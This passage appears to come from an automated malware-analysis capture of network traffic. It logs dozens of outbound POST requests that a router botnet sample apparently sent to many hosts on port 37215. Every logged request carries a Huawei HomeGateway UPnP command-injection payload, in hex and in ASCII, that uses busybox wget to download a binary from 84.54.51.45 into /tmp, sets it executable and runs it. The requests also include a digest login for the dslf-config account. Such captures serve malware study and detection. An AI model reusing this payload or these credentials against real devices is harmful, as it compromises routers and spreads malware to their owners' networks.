                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1018192.168.2.153523241.60.120.1937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911915064 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1019192.168.2.155464041.11.200.25437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911917925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1020192.168.2.156082441.197.61.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911966085 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1021192.168.2.153692641.96.92.9237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911967039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1022192.168.2.155958441.84.79.25437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911968946 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1023192.168.2.153342441.36.1.14737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911968946 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1024192.168.2.156036241.168.134.4937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912012100 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1025192.168.2.153561041.27.80.8637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912012100 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1026192.168.2.155755241.126.227.16637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912080050 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1027192.168.2.154569641.174.80.2737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912080050 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
